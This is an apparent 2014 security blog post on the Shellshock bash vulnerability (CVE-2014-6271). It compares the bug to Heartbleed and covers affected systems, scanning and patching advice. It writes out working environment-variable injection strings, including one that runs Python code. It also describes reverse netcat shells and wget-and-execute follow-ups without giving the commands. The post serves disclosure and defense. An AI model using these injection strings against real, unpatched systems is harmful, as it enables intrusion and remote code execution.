Bash Vulnerability CVE-2014-6271 – Worm-able and Possibly Worse Than Heartbleed

Post Updated 9/30/2014

Several months ago, the Internet was put to a halt when the Heartbleed vulnerability was disclosed. Webservers, devices, and essentially anything running SSL were affected; as a result, attackers were able to collect passwords, free of charge.

With Heartbleed, the exploit made a splash and many attackers started to use the vulnerability. One of the more high-profile attacks of Heartbleed was the CHS attack, where the attackers siphoned 4.5 million patient records by attacking a Juniper device, then hopping onto their VPN.

So how can something be bigger than Heartbleed? I’m glad you asked.

According to the bash code injection vulnerability by Redhat, you can test to see if your system is vulnerable by executing the following test:

$ env x='() { :;}; echo vulnerable’ bash -c “echo this is a test”

If you see the word vulnerable, you’re vulnerable. I loaded up an OS X terminal without thinking, and was surprised by the results: OS X is vulnerable. (Figure 1)

Figure 1

Figure 1 — OSX Vulnerability

Throwing together a little python command-line kungfu, I wanted to see how far I could take it and if I could get python code to execute with the following line:

env x='() { :;}; python -c “import base64; print base64.b64decode(“cHl0aG9uIGNvZGUgc3VjY2Vzc2Z1bA==”);”‘ bash -c “echo this is a test”

Again… successful.

Figure 2

Figure 2 — Successful python code execution

Better yet… why not reverse netcat shell?

Figure 3

Figure 3 — Reverse netcat shell with established connection

So you don’t have netcat installed on your system? Hats off to you. But did you remove wget? If not, all an attacker needs to do is wget to remotely download a file and then execute it. Have python or ruby installed? There’s a plethora of reverse shells out there. But the carnage doesn’t stop there.

One researcher went to the extent of scanning to scope the scale of vulnerable systems, and has been keeping the world updated on the results. By appending the code in potential CGI variables, he was able to execute a ping request on these systems to see how many systems are affected.

Figure 4

Figure 4 — Snippet of code from Errata Security

According to CSO Online, code execution through OpenSSH is possible, too. This gives an attacker yet another way to get onto a system.

The Register is reporting some DHCP clients are vulnerable, too.

What else runs OpenSSH, acts as a DHCP client, and runs on *nix? You guessed it, home routers, modems, and other embedded devices. If an attacker uses these as jump points in order to scan internal subnets and get reverse shells back from here? It’s not looking good.

With the number of Internet facing devices vulnerable to this, it would be very easy for an attacker to turn this into a worm, and bore itself past external gateways into homes. When was the last time you patched your TV? And with the current scan of the entire Internet going on, an attacker could easily turn this into a fork bomb, hogging CPU resources, and crashing systems around the globe. But how can you help fix this?

Prepare your system administration and operations staff with information about the severity of this bug. Even though many product and system vendors have yet to release a patch, an organization can still do the foot work needed to understand which systems will require a maintenance window. Have IT staff inventory and rank systems that may be vulnerable to accepting BASH parameters from untrusted sources and prioritize the patch schedule based on which of those systems have the greatest exposure.

As of the time of writing, the patch is only partially fixed according to SANS, and systems are still vulnerable. To test the patch to see if you’re still vulnerable, use the command env X='() { (a)=>’ sh -c “echo date”;

Updated September 30

In the past week, the bash bug has continued to evolve. Currently, there are five or six different vulnerabilities around bash. Read more details on those vulnerabilities here and here. Apple has released patches and they are available through software update, according to Apple Insider. It also looks like the bash exploit has been around for 20 years, unlike the three of Heartbleed. Shellshock is also in the wild, currently being exploited by many attackers for stealing password files, UDP flooding, and many flavors of IRC bots. While we haven’t seen APT attacks using this technique, it doesn’t mean that they aren’t using it or won’t use it in the future. So stay vigilant and report anything that looks suspicious.

National Cybersecurity Awareness Month 2014
'Shellshock' Bash Bug Impacts Basically Everything, Exploits Appear In Wild